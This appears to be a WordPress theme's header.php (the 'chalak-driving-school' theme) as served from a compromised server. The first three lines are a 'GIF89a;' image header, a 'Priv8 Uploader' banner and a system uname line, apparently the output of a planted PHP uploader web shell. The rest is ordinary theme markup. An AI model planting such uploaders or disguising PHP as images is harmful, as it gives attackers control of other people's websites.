GIF89a;
Priv8 Uploader By InMyMine7
Linux h2 5.10.0-38-amd64 #1 SMP Debian 5.10.249-1 (2026-02-10) x86_64
<?php
/**
* The header for our theme
*
* @subpackage chalak-driving-school
* @since 1.0
* @version 0.1
*/
?><!DOCTYPE html>
<html <?php language_attributes(); ?> class="no-js no-svg">
<head>
<meta charset="<?php bloginfo( 'charset' ); ?>">
<meta name="viewport" content="width=device-width, initial-scale=1">
<?php wp_head(); ?>
</head>
<body <?php body_class(); ?>>
<?php if ( function_exists( 'wp_body_open' ) ) {
wp_body_open();
} else {
do_action( 'wp_body_open' );
}?>
<header role="banner" id="header">
<a class="skip-link screen-reader-text" href="#content"><?php esc_html_e( 'Skip to content', 'chalak-driving-school' ); ?></a>
<?php if (get_theme_mod('chalak_driving_school_hide_show_topbar',false) == true) {?>
<div class="top-header">
<div class="container">
<div class="top">
<span class="phone">
<?php if( get_theme_mod( 'chalak_driving_school_call','' ) != '') { ?>
<span class="col-org"><a href="tel:<?php echo esc_attr( get_theme_mod('chalak_driving_school_call','') ); ?>"><i class="fas fa-phone"></i><?php echo esc_html( get_theme_mod('chalak_driving_school_call','') ); ?></a></span>
<?php } ?>
</span>
<span class="email">
<?php if( get_theme_mod( 'chalak_driving_school_mail','' ) != '') { ?>
<span class="col-org"><a href="mailto:<?php echo esc_attr( get_theme_mod('chalak_driving_school_mail','') ); ?>"><i class="fas fa-envelope"></i><?php echo esc_html( get_theme_mod('chalak_driving_school_mail','') ); ?></a></span>
<?php } ?>
</span>
<span class="social-icons">
<?php if( get_theme_mod( 'chalak_driving_school_facebook_url') != '') { ?>
<a href="<?php echo esc_url( get_theme_mod( 'chalak_driving_school_facebook_url','' ) ); ?>"><i class="fab fa-facebook-f" aria-hidden="true"></i></a>
<?php } ?>
<?php if( get_theme_mod( 'chalak_driving_school_twitter_url') != '') { ?>
<a href="<?php echo esc_url( get_theme_mod( 'chalak_driving_school_twitter_url','' ) ); ?>"><i class="fab fa-twitter"></i></a>
<?php } ?>
<?php if( get_theme_mod( 'chalak_driving_school_youtube_url') != '') { ?>
<a href="<?php echo esc_url( get_theme_mod( 'chalak_driving_school_youtube_url','' ) ); ?>"><i class="fab fa-youtube"></i></a>
<?php } ?>
<?php if( get_theme_mod( 'chalak_driving_school_linkedin_url') != '') { ?>
<a href="<?php echo esc_url( get_theme_mod( 'chalak_driving_school_linkedin_url','' ) ); ?>"><i class="fab fa-linkedin-in"></i></a>
<?php } ?>
<?php if( get_theme_mod( 'chalak_driving_school_insta_url') != '') { ?>
<a href="<?php echo esc_url( get_theme_mod( 'chalak_driving_school_insta_url','' ) ); ?>"><i class="fab fa-instagram"></i></a>
<?php } ?>
</span>
</div>
</div>
</div>
<?php }?>
<div class="menu-section">
<div class="container">
<div class="main-top">
<div class="row">
<div class="col-lg-3 col-md-5 col-9">
<div class="logo">
<?php if ( has_custom_logo() ) : ?>
<div class="site-logo"><?php the_custom_logo(); ?></div>
<?php endif; ?>
<?php if (get_theme_mod('chalak_driving_school_show_site_title',true)) {?>
<?php $blog_info = get_bloginfo( 'name' ); ?>
<?php if ( ! empty( $blog_info ) ) : ?>
<?php if ( is_front_page() && is_home() ) : ?>
<h1 class="site-title"><a href="<?php echo esc_url( home_url( '/' ) ); ?>" rel="home"><?php bloginfo( 'name' ); ?></a></h1>
<?php else : ?>
<p class="site-title"><a href="<?php echo esc_url( home_url( '/' ) ); ?>" rel="home"><?php bloginfo( 'name' ); ?></a></p>
<?php endif; ?>
<?php endif; ?>
<?php }?>
<?php if (get_theme_mod('chalak_driving_school_show_tagline',true)) {?>
<?php
$description = get_bloginfo( 'description', 'display' );
if ( $description || is_customize_preview() ) :
?>
<p class="site-description">
<?php echo esc_html($description); ?>
</p>
<?php endif; ?>
<?php }?>
</div>
</div>
<?php if(has_nav_menu ('primary')){ ?>
<div class="col-lg-9 col-md-7 col-3 align-self-end">
<div class="toggle-menu responsive-menu">
<button onclick="chalak_driving_school_open()" role="tab" class="mobile-menu"><i class="fas fa-bars"></i><span class="screen-reader-text"><?php esc_html_e('Open Menu','chalak-driving-school'); ?></span></button>
</div>
<div id="sidelong-menu" class="nav sidenav">
<nav id="primary-site-navigation" class="nav-menu" role="navigation" aria-label="<?php esc_attr_e( 'Top Menu', 'chalak-driving-school' ); ?>">
<?php
wp_nav_menu( array(
'theme_location' => 'primary',
'container_class' => 'main-menu-navigation clearfix' ,
'menu_class' => 'clearfix',
'items_wrap' => '<ul id="%1$s" class="%2$s mobile_nav">%3$s</ul>',
'fallback_cb' => 'wp_page_menu',
) );
?>
<a href="javascript:void(0)" class="closebtn responsive-menu" onclick="chalak_driving_school_close()"><i class="fas fa-times"></i><span class="screen-reader-text"><?php esc_html_e('Close Menu','chalak-driving-school'); ?></span></a>
</nav>
</div>
</div>
<?php }?>
</div>
</div>
</div>
</div>
</header><hr class="hr-hr">
<?php if(is_singular()) {?>
<div id="inner-pages-header">
<div class="header-content py-2">
<div class="container">
<h1><?php single_post_title(); ?></h1>
</div>
</div>
<div class="theme-breadcrumb py-2">
<div class="container">
<?php chalak_driving_school_breadcrumb();?>
</div>
</div>
</div>
<?php } ?>